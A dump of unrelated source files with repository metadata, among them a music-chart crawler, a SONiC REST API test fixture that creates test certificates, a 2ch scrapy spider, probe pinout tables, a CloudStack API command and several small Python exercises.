musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
print(album_tag)
print(artist_tag)
if album_tag != None:
albumVO.Album_Title = album_tag.get_text()
albumVO.Album_Node = album_tag["href"].strip(" ")
albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
musicVO.Album_ID = albumVO.Album_ID
if artist_tag != None:
artistVO.Artist_Name = artist_tag.get_text()
# 객체 및 테이블에 노드 추가 할 것!
artistVO.Artist_Node = artist_tag["href"].strip(" ")
artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
albumVO.Singer_ID = artistVO.Artist_ID
# #######commit 계속 안하고 한방에 못하는지 알아보고, ORM 객체 내 객체 포함...으로 알아볼 것!!!
# 양방향 머시기 하는듯...
db_session.merge(artistVO)
db_session.commit()
db_session.merge(albumVO)
db_session.commit()
db_session.merge(musicVO)
db_session.commit()
def crawling_track(url):
# 값을 입력할 VO 객체 생성
musicVO = Music_VO()
albumVO = Album_VO()
artistVO = Artist_VO()
# Music_ID 는 링크로부터 채워서 올것!
# Music_VO.Music_ID =
# bs from html response....
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
# 곡 소개 테이블
summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
album_tag = summary.find('tbody').find('a')
if album_tag is not None:
albumVO.Album_Node = album_tag['href'].strip(" ")
albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
musicVO.Album_ID = albumVO.Album_ID
artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
if artist_tag != None:
artistVO.Artist_Node = artist_tag['href'].strip(" ")
artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
artistVO.Artist_Name = artist_tag.get_text()
albumVO.Singer_ID = artistVO.Artist_ID
attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})
def crawling_artist(id):
artistVO = Artist_VO()
artistVO.Artist_ID = id
artistVO.Artist_Node = '/artist/{0}'.format(id)
artistVO.Group = False
url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
html = cw.crawling(url)
bs = BeautifulSoup(html, 'html.parser')
tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
if tag_artist_info is not None:
singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
if singer is not None:
artistVO.Artist_Name = singer.get_text()
else:
artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
'p').get_text().strip()
print("############# strip 결과 #############\n", artistVO.Artist_Name,
"\n############# strip 결과 #############\n")
a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
for tag in tags:
if tag is not None:
text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
'\t', '').replace('\xa0', '').split('|')
print(text_list)
for text in text_list:
if text == '남성' or text == '여성' or text == '혼성':
artistVO.Gender = text
if text == '그룹':
artistVO.Group = True
db_session.merge(artistVO)
db_session.commit()
time.sleep(0.5) # sleep 안주면 200 번째 request 이후 차단됨...
# 방화벽 or IPS
# 메인에서 호출할 함수들.....
def collecting_artist(self):
for id in range(1, 3000000, 1):
self.crawling_artist(id)
def collecting_track(self, node):
um = UrlMaker()
row_num_table = Music_VO.qurey.count()
for offs in range(0, row_num_table, 10):
result = Music_VO.query.limit(10).offset(offs).all()
for i in result:
self.crawling_track(um.direct_node_connect(i.Music_Node))
def collecting_chart(self):
um = UrlMaker()
for year in range(self.start_date.year, self.end_date.year+1):
for month in range(self.start_date.month, self.end_date.month+1):
try:
um.setDate(datetime.date(year, month, day=1))
um.url_maker_DATE_based()
for page_number in range(1, 3):
url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
print(url)
Collector.crawling_mnet_month_chart(url)
except ValueError:
break
# def __init__(self, start_date=datetime.date(2009, 1, 1), end_date=datetime.datetime.now().date()):
# # def __init__(self, start_date = datetime.date(2009, 1, 1), end_date = datetime.datetime.now().date()):
# self.start_date = start_date
# self.end_date = end_date
def __init__(self):
self.set_start_date()
self.end_date = datetime.datetime.now().date()
def set_start_date(self, year = 2009, month = 8, day = 1):
self.start_date = datetime.date(2009, 8, 1)
def set_end_date(self, year, month, day):
self.end_date = datetime.date(year, month, day)
|
[
"[email protected]"
] | |
62ccef834d24c047c8d8308cd15dcbfcacd02062
|
49663ea34b41c8180d7484f778f5cad2e701d220
|
/tests/restapi/conftest.py
|
8915e5344b0b69e02c6d33ddb2f2045958be013b
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
stepanblyschak/sonic-mgmt
|
ed08c98e7bff1615b057daa8711686aa5986073d
|
a1ae1e0b4e9927e6f52916f76121780d19ec3e54
|
refs/heads/master
| 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 |
NOASSERTION
| 2023-03-29T16:13:55 | 2018-06-01T06:41:49 |
Python
|
UTF-8
|
Python
| false | false | 4,694 |
py
|
import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
'''
Create RESTAPI client certificates and copy the subject names to the config DB
'''
duthost = duthosts[rand_one_dut_hostname]
# Check if RESTAPI is enabled on the device
pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
"Test was not supported on devices which do not support RESTAPI!")
# Create Root key
local_command = "openssl genrsa -out restapiCA.key 2048"
localhost.shell(local_command)
# Create Root cert
local_command = "openssl req \
-x509 \
-new \
-nodes \
-key restapiCA.key \
-sha256 \
-days 1825 \
-subj '/CN=test.restapi.sonic' \
-out restapiCA.pem"
localhost.shell(local_command)
# Create server key
local_command = "openssl genrsa -out restapiserver.key 2048"
localhost.shell(local_command)
# Create server CSR
local_command = "openssl req \
-new \
-key restapiserver.key \
-subj '/CN=test.server.restapi.sonic' \
-out restapiserver.csr"
localhost.shell(local_command)
# Sign server certificate
local_command = "openssl x509 \
-req \
-in restapiserver.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiserver.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Create client key
local_command = "openssl genrsa -out restapiclient.key 2048"
localhost.shell(local_command)
# Create client CSR
local_command = "openssl req \
-new \
-key restapiclient.key \
-subj '/CN=test.client.restapi.sonic' \
-out restapiclient.csr"
localhost.shell(local_command)
# Sign client certificate
local_command = "openssl x509 \
-req \
-in restapiclient.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiclient.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Copy CA certificate and server certificate over to the DUT
duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
apply_cert_config(duthost)
urllib3.disable_warnings()
yield
# Perform a config load_minigraph to ensure config_db is not corrupted
config_reload(duthost, config_source='minigraph')
# Delete all created certs
local_command = "rm \
restapiCA.* \
restapiserver.* \
restapiclient.*"
localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
def get_endpoint(path):
duthost = duthosts[rand_one_dut_hostname]
RESTAPI_PORT = "8081"
netloc = duthost.mgmt_ip+":"+RESTAPI_PORT
try:
tup = ('https', netloc, path, '', '', '')
endpoint = urlunparse(tup)
except Exception:
logging.error("Invalid URL: "+endpoint)
return None
return endpoint
return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
VLAN_INDEX = 0
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
if mg_facts["minigraph_vlans"] != {}:
vlan_interfaces = list(mg_facts["minigraph_vlans"].values())[VLAN_INDEX]["members"]
if vlan_interfaces is not None:
return vlan_interfaces
return []
|
[
"[email protected]"
] | |
80954ebe7830dd8dfab25e0a013922bc01815edb
|
160ff0dbe7f9e5d740faa3ce13302190e1e5f1f0
|
/Calc.py
|
db893a216b2d9cc553077be5697b83b7af2224fd
|
[] |
no_license
|
sivatoms/PyReddy
|
9a84e1568e9ee6c16c2b51ba6044059d31ae62dd
|
fcc0ab8705d409c6b609f9b5f5cffb8900dd8eb7
|
refs/heads/master
| 2021-06-26T17:42:43.104598 | 2021-01-20T21:40:06 | 2021-01-20T21:40:06 | 197,511,789 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 187 |
py
|
from Demo import wish
def add(a,b):
print(a+b)
def sub(a,b):
print(a-b)
def mul(a,b):
print(a*b)
def div(a,b):
print(a/b)
wish()
print("This is second modules")
|
[
"[email protected]"
] | |
03ff54224dfdb710b2127f90b62adc825688daf5
|
419637376e445ec9faf04c877d5fb6c09d15903f
|
/steam/admin/activity/productAuditService.py
|
ec92efa0a2a88750d9fbbdda4e0b8a68c42dbce8
|
[] |
no_license
|
litaojun/steamOmTest
|
e4203df30acafaa5e282631d77429c0e4483fb88
|
86f84dbd802d947198823e02c2f1ba2695418a76
|
refs/heads/master
| 2020-04-02T21:48:55.115389 | 2019-07-11T06:08:27 | 2019-07-11T06:08:27 | 154,812,217 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
from steam.util.httpUopService import HttpUopService
from opg.bak.uopService import decorator
class ProductAuditService(HttpUopService):
'''
审核活动
'''
def __init__(self, kwargs):
super(ProductAuditService, self).__init__(module = "",
filename = "",
sqlvaluedict = kwargs )
@decorator(["setupAuditActivity"])
def optAuditActivity(self):
self.sendHttpReq()
|
[
"[email protected]"
] | |
043726843b64f7026111458e53c6551599ad3e12
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03328/s713805169.py
|
9bf51a8dd2d62f9ce6c096b400cb84417951bd79
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 454 |
py
|
import sys
import math
import itertools
import collections
import heapq
import re
import numpy as np
from functools import reduce
rr = lambda: sys.stdin.readline().rstrip()
rs = lambda: sys.stdin.readline().split()
ri = lambda: int(sys.stdin.readline())
rm = lambda: map(int, sys.stdin.readline().split())
rl = lambda: list(map(int, sys.stdin.readline().split()))
inf = float('inf')
mod = 10**9 + 7
a, b = rm()
c = b - a
c = c*(c+1)//2
print(c-b)
|
[
"[email protected]"
] | |
f096553bf112edde9a685cccede57835e9c15dd8
|
392a35174450d1151d276481be4bb4c1ed1fc841
|
/chapter-05/Q06_conversion.py
|
d280bd750de009a1f698bee7dc71814d7822e90f
|
[] |
no_license
|
jcockbain/ctci-solutions
|
8f96a87532a7581cdfc55c29c8684fcdfab77a62
|
6854e9f6c7074ae22e01c3e5f6c03f641e507cd7
|
refs/heads/master
| 2023-01-15T16:59:58.038900 | 2020-11-28T09:14:36 | 2020-11-28T09:14:36 | 202,898,842 | 6 | 0 | null | 2020-11-28T09:14:37 | 2019-08-17T15:33:25 |
Python
|
UTF-8
|
Python
| false | false | 254 |
py
|
import unittest
def conversion(n1, n2):
c = n1 ^ n2
count = 0
while c:
c &= c - 1
count += 1
return count
class Test(unittest.TestCase):
def test_conversion(self):
self.assertEqual(2, conversion(29, 15))
|
[
"[email protected]"
] | |
d3c04239cbf82fb6c83edd7f0d839a76a25a1fb7
|
c19ca6779f247572ac46c6f95327af2374135600
|
/backtrack/leetcode 784 Letter Case Permutation.py
|
7145ae98631ee4d97b9ba49b7d4cfe96f90f5f24
|
[] |
no_license
|
clhchtcjj/Algorithm
|
aae9c90d945030707791d9a98d1312e4c07705f8
|
aec68ce90a9fbceaeb855efc2c83c047acbd53b5
|
refs/heads/master
| 2021-01-25T14:24:08.037204 | 2018-06-11T14:31:38 | 2018-06-11T14:31:38 | 123,695,313 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,006 |
py
|
__author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
def __init__(self):
self.S = []
self.answer = []
self.total_answer = []
def is_a_solution(self,k):
return k == len(self.S)
def process_solution(self):
self.total_answer.append(''.join(self.answer))
def constact_candiates(self, k):
if self.S[k].isalpha():
if ord(self.S[k]) > 96:
return [self.S[k],chr(ord(self.S[k])-32)]
else:
return [chr(ord(self.S[k])+32),self.S[k]]
else:
return [self.S[k]]
def backtrack(self,k):
if self.is_a_solution(k):
self.process_solution()
else:
k = k + 1
candidates = self.constact_candiates(k-1)
for ch in candidates:
self.answer.append(ch)
self.backtrack(k)
self.answer.pop()
if k == len(self.answer):
return
def letterCasePermutation(self, S):
"""
:type S: str
:rtype: List[str]
"""
self.S = S
self.backtrack(0)
return self.total_answer
# 简单解法
# def letterCasePermutation(self, S):
# ans = [[]]
#
# for char in S:
# n = len(ans)
# if char.isalpha():
# for i in range(n):
# ans.append(ans[i][:])
# ans[i].append(char.lower())
# ans[n+i].append(char.upper())
# else:
# for i in range(n):
# ans[i].append(char)
# # temp = list(map("".join, ans))
# # print(temp)
# return list(map("".join, ans))
if __name__ == "__main__":
S = Solution()
print(S.letterCasePermutation("a1b2"))
|
[
"[email protected]"
] | |
56a2b628001cbc8b80e9af74b4972644b513bd67
|
81407be1385564308db7193634a2bb050b4f822e
|
/library/lib_study/138_mm_imghdr.py
|
b2e25a38bf54fb2a4859d179ee87719fc5ae4348
|
[
"MIT"
] |
permissive
|
gottaegbert/penter
|
6db4f7d82c143af1209b4259ba32145aba7d6bd3
|
8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d
|
refs/heads/master
| 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 |
MIT
| 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null |
UTF-8
|
Python
| false | false | 210 |
py
|
# imghdr模块 推测文件或字节流中的图像的类型
import imghdr
print(imghdr.what('bass.gif'))
# gif
# 可以识别的图像类型 https://docs.python.org/zh-cn/3/library/imghdr.html#imghdr.what
|
[
"[email protected]"
] | |
ee9ade01e55751cb4ad59fad7e8007aa52bf3c2d
|
d5b339d5b71c2d103b186ed98167b0c9488cff09
|
/marvin/cloudstackAPI/createCounter.py
|
a4ed8386ce48bc5d359fb2c7235ada34f89378f4
|
[
"Apache-2.0"
] |
permissive
|
maduhu/marvin
|
3e5f9b6f797004bcb8ad1d16c7d9c9e26a5e63cc
|
211205ae1da4e3f18f9a1763f0f8f4a16093ddb0
|
refs/heads/master
| 2020-12-02T17:45:35.685447 | 2017-04-03T11:32:11 | 2017-04-03T11:32:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,275 |
py
|
"""Adds metric counter"""
from baseCmd import *
from baseResponse import *
class createCounterCmd (baseCmd):
typeInfo = {}
def __init__(self):
self.isAsync = "true"
"""Name of the counter."""
"""Required"""
self.name = None
self.typeInfo['name'] = 'string'
"""Source of the counter."""
"""Required"""
self.source = None
self.typeInfo['source'] = 'string'
"""Value of the counter e.g. oid in case of snmp."""
"""Required"""
self.value = None
self.typeInfo['value'] = 'string'
self.required = ["name", "source", "value", ]
class createCounterResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the id of the Counter"""
self.id = None
self.typeInfo['id'] = 'string'
"""Name of the counter."""
self.name = None
self.typeInfo['name'] = 'string'
"""Source of the counter."""
self.source = None
self.typeInfo['source'] = 'string'
"""Value in case of snmp or other specific counters."""
self.value = None
self.typeInfo['value'] = 'string'
"""zone id of counter"""
self.zoneid = None
self.typeInfo['zoneid'] = 'string'
|
[
"[email protected]"
] | |
087a67e5405e3ada78f98dc48c3379436a96b3a2
|
6ac723c541e410f737be68f0af634c738e881d74
|
/probes.py
|
abd27d07112f5ce2f0c88bd8935838e6c005df25
|
[] |
no_license
|
cxrodgers/Adapters
|
d478616372ca9fbfc55a886d5b384a15b01a7b91
|
da68169c4bb8d8f3c4df13205df2626635632cb8
|
refs/heads/master
| 2022-12-22T07:46:25.588285 | 2022-12-09T15:21:54 | 2022-12-09T15:21:54 | 4,681,174 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,830 |
py
|
"""Pinout for each probe, from channel numbers to Samtec numbers."""
from builtins import range
import Adapters
## This is for Adrian's 1x8 shank array
# This one goes from "electrode #" (depth?) to "interposer PCB #"
adrian_8shank2interposer = Adapters.Adapter(
[27, 25, 21, 20, 9],
[41, 45, 53, 55, 52],
)
# This one goes from interposer PCB # to Samtec numbers
# This uses the little handbuild adapter I made that is an ON1 (I think)
# superglued to a breadboard PCB and hand-wired.
# Here I will use 41-80 as Samtec numbers, with 1 in the upper left when
# looking into the next adapter (out of the probe).
# The reason to use 41-80 is because this will be used with the bottom
# connector on ON4.
interposer2samtec = Adapters.Adapter([
33, 34, 35, 36, 37, 38, 39, 40, # first column (shank side to top side)
41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, #52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, 63,
64, 60, 56,
]
)
# Hack the above
# The inner column of interposer doesn't have any useful sites, according
# to Adrian. And the outer column of my adapter isn't wired up fully.
# So, shift the interposer such that its inner column is floating.
# Same as above, except
interposer2samtec_shifted = Adapters.Adapter([
#33, 34, 35, 36, 37, 38, 39, 40, # first (innermost) column (shank side to top side)
48, 47, 46, 45, 44, 43, 42, 41, # second column (shank side to top side)
#41, 42, 43, 44, 45, 46, 47, 48, # second column (top side to shank side)
49, 50, 51, 52, 53, 54, 55, # third column (shank side to top side)
], [
53, 57, 58, 61, 62, 65, 73, 77,
49, 45, 41, 80, 76, 72, 68, #63,
#64, 60, 56,
]
)
## End Adrian's array
# This is the A32 connector pinout from neuronexus.
# Takes us from "Samtec numbers" to Neuronexus channel numbers.
# Samtec numbers go from 1-40, with 1 in the upper right when looking at
# the probe, or 1 in the upper left when looking at the adapter.
samtec2nn = Adapters.Adapter(list(range(1, 41)), [
11, 'GND', 'GND', 32,
9, 'REF', 'NC', 30,
7, 'NC', 'NC', 31,
5, 'NC', 'NC', 28,
3, 1, 26, 29,
2, 4, 24, 27,
6, 13, 20, 25,
8, 14, 19, 22,
10, 15, 18, 23,
12, 16, 17, 21,
])
# This is for the Janelia pinout
# As before, Samtec numbers go from 1-40, with 1 in the upper right when
# looking at the probe. The source doc from Tim Harris shows the back side
# of the probe, so 1 is in the upper left (as it is for the adapter).
samtec2janelia_top = Adapters.Adapter(list(range(1, 41)), [
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
])
samtec2janelia_bottom = Adapters.Adapter(list(range(1, 41)), [
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
])
# A 64-channel version with two samtecs, 1-40 on the top and 41-80 on the bottom
samtec2janelia_64ch = Adapters.Adapter(list(range(1, 81)),
[
1, 'NC', 'NC', 64,
2, 'NC', 'NC', 63,
3, 'NC', 'NC', 62,
4, 'NC', 'NC', 61,
5, 6, 59, 60,
7, 8, 57, 58,
9, 10, 55, 56,
11, 12, 53, 54,
13, 14, 51, 52,
15, 16, 49, 50,
17, 'NC', 'NC', 48,
18, 'NC', 'NC', 47,
19, 'NC', 'NC', 46,
20, 'NC', 'NC', 45,
21, 22, 43, 44,
23, 28, 37, 42,
24, 32, 33, 41,
25, 29, 36, 40,
26, 30, 35, 39,
27, 31, 34, 38,
])
|
[
"[email protected]"
] | |
161ef121e5f50f8ab2a32b0600ab9a65c050b69b
|
01b49cefcb2e1aae896a444e525c4cd09aff68be
|
/nyankobiyori.py
|
5e84f044fb388d972b61ccd0aeeb3abbcb0436e1
|
[
"MIT"
] |
permissive
|
ikeikeikeike/scrapy-2ch-summary-spiders
|
308eccbe83bfc03064ec4b7a9b3952985bf58a15
|
7142693f25025a09390377649a727cfd33d15af3
|
refs/heads/master
| 2020-04-01T18:04:38.319532 | 2015-01-08T08:30:16 | 2015-01-08T08:30:16 | 28,956,442 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,625 |
py
|
# -*- coding: utf-8 -*-
import re
import itertools
from scrapy import log
from scrapy.selector import Selector
from summaries.items import SummariesItem
from thread_float_bbs import (
SequenceAppend,
ThreadFloatBbsSpider
)
class NyankobiyoriSpider(ThreadFloatBbsSpider):
""" for nyankobiyori.com
"""
name = 'nyankobiyori'
allowed_domains = ['nyankobiyori.com']
start_urls = ['http://nyankobiyori.com/index.rdf']
def spider_page(self, response):
""" scraping page
"""
sel = Selector(response)
image_urls = []
contents = SequenceAppend({
"index": int,
"subject": '',
"body": ''
})
# Main
main = sel.css('div.body')
generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
for sub, body in generator:
image_urls.extend(sub.css('img').xpath('@src').extract())
image_urls.extend(body.css('img').xpath('@src').extract())
contents.append({
"subject": sub.extract(),
"body": body.extract()
})
# body more
main = sel.css('div.bodymore')
generator = itertools.izip(main.css('.t_h'), main.css('.t_b'))
for sub, body in generator:
image_urls.extend(sub.css('img').xpath('@src').extract())
image_urls.extend(body.css('img').xpath('@src').extract())
contents.append({
"subject": sub.extract(),
"body": body.extract()
})
item = dict(
posted=False,
source=self.extract_source(sel),
url=response.url,
title=self.get_text(sel.css('h1 span')),
tags=self.extract_tags(sel, response),
contents=contents.result(),
image_urls=image_urls
)
# set title from source.
return self.request_title(item['source'], SummariesItem(**item))
def extract_source(self, selector):
""" Sourceを抽出
"""
try:
url = [
text for
text in selector.css('div.bodymore span').xpath('text()').extract()
if text.find('2ch.net') != -1
or text.find('2ch.sc') != -1
or text.find('www.logsoku.com') != -1
][0]
return re.search(u"(?P<url>https?://[^\s][^」]+)", url).group("url").strip()
except Exception as exc:
log.msg(
format=("Extract source (error): "
"Error selector %(selector)s "
"url `%(url)s`: %(errormsg)s"),
level=log.WARNING,
spider=self,
selector=selector,
url=selector.response.url,
errormsg=str(exc))
return None
def extract_tags(self, selector, response):
""" tagsを抽出
"""
try:
feed = self.get_feed(response.url)
tags = [
self.get_text(tag)
for tag in selector.css('p[class^=category_] a,p.tag a')
]
return list(set([feed['tags'][0]['term']] + tags))
except Exception as exc:
log.msg(
format=("Extract tags (error): "
"Error selector %(selector)s "
"url `%(url)s`: %(errormsg)s"),
level=log.WARNING,
spider=self,
selector=selector,
url=response.url,
errormsg=str(exc))
return []
|
[
"[email protected]"
] | |
09efa3e2cc46a870ee131e9c706297c18b8b44e4
|
2db5bf5832ddb99e93bb949ace1fad1fde847319
|
/beginLearn/googleclass/class4/pdtest.py
|
3b933a6cef80f4c7bb2ba24fc99b874212470863
|
[] |
no_license
|
RoderickAdriance/PythonDemo
|
2d92b9aa66fcd77b6f797e865df77fbc8c2bcd14
|
98b124fecd3a972d7bc46661c6a7de8787b8e761
|
refs/heads/master
| 2020-04-06T17:36:46.000133 | 2018-11-15T07:07:03 | 2018-11-15T07:07:03 | 157,666,809 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 711 |
py
|
import pandas as pd
import numpy as np
city_names=pd.Series(['San Francisco', 'San Jose', 'Sacramento'])
population = pd.Series([852469, 1015785, 485199])
cities = pd.DataFrame({'City name': city_names, 'Population': population})
california_housing_dataframe=pd.read_csv('data.csv')
california_housing_dataframe.hist('housing_median_age')
# population=population/1000
#log 实际上不是以10为底,而是以 e 为底
log_population = np.log(population)
apply = population.apply(lambda val: val > 500000)
cities['Area square miles']=pd.Series([46.87, 176.53, 97.92])
cities['Population density']=cities['Population']/cities['Area square miles']
reindex = cities.reindex([0, 5, 2, 8])
print(reindex)
|
[
"[email protected]"
] | |
0a06a2b02ea2ebe7e1e750ff6fcf6079526a4e8e
|
53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61
|
/.history/EMR/zhzd_add_20190618132817.py
|
d0748388e5fbee29a405014068576007a52ae777
|
[] |
no_license
|
cyc19950621/python
|
4add54894dc81187211aa8d45e5115903b69a182
|
d184b83e73334a37d413306d3694e14a19580cb0
|
refs/heads/master
| 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 766 |
py
|
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
import pandas as pd
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRzhzd5')#txt目录提取
emrtxt2s = EMRdef.txttq(u'D:\DeepLearning ER\EHRsex')
ryzd = []
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrpath = os.path.basename(emrtxt)
emrpath = os.path.splitext(emrpath)[0]#提取目录
lines=f.readlines()
for emrtxt2 in emrtxt2s:
f2 = open(emrtxt2,'r',errors="ignore")#中文加入errors
emrpath2 = os.path.basename(emrtxt2)
emrpath2 = os.path.splitext(emrpat2)[0]#提取目录
lines2 = f2.readlines()
if emrpath == emrpath2:
lines.append(lines2)
|
[
"[email protected]"
] | |
953d8bc38856a27f6a9df03d5819e05e01559c06
|
646b0a41238b96748c7d879dd1bf81858651eb66
|
/src/mdt/orm/GulpOpt.py
|
177f7a316baa5b0cda918805763bfe60e8fcfac3
|
[] |
no_license
|
danse-inelastic/molDynamics
|
ded0298f8219064e086472299e1383d3dff2dac3
|
c8e0bfd9cb65bcfc238e7993b6e7550289d2b219
|
refs/heads/master
| 2021-01-01T19:42:29.904390 | 2015-05-03T17:27:38 | 2015-05-03T17:27:38 | 34,993,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,749 |
py
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# J Brandon Keith, Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from ..GulpOpt import GulpOpt
from Gulp import Gulp
class Inventory(Gulp.Inventory):
optimize_coordinates = Gulp.Inventory.d.bool(name = 'optimize_coordinates', default = True)
optimize_coordinates.label = 'Optimize coordinates?'
optimize_cell = Gulp.Inventory.d.bool(name = 'optimize_cell', default = False)
optimize_cell.label = 'Optimize the cell?'
constraint = Gulp.Inventory.d.str(name = 'constraint', default = 'constant volume')
constraint.label = 'Constraint'
constraint.validator = Gulp.Inventory.v.choice(['None', 'constant volume', 'constant pressure'])
# XXX: see Gulp.py
# trajectoryfile = Gulp.Inventory.d.str(name = 'trajectoryfile', default = 'gulp.his')
# trajectoryfile.label = 'Trajectory Filename'
# restartfile = Gulp.Inventory.d.str(name = 'restartfile', default = 'gulp.res')
# restartfile.label = 'Restart Filename'
GulpOpt.Inventory = Inventory
def customizeLubanObjectDrawer(self, drawer):
drawer.sequence = ['properties', 'forcefield']
drawer.mold.sequence = [
'optimize_coordinates',
'optimize_cell',
'constraint',
'temperature', 'pressure',
'identify_molecules',
'assign_bonds_from_initial_geometry',
'calc_dispersion_in_recip_space',
]
return
GulpOpt.customizeLubanObjectDrawer = customizeLubanObjectDrawer
|
[
"[email protected]"
] | |
01b65fa62f033ee2bb173040766119fcba0b4fe2
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/pinpoint_write_2/endpoint_delete.py
|
cf53331aefddda4f6a700adcbf0325709acdb957
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,101 |
py
|
#!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-endpoint.html
if __name__ == '__main__':
"""
get-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-endpoint.html
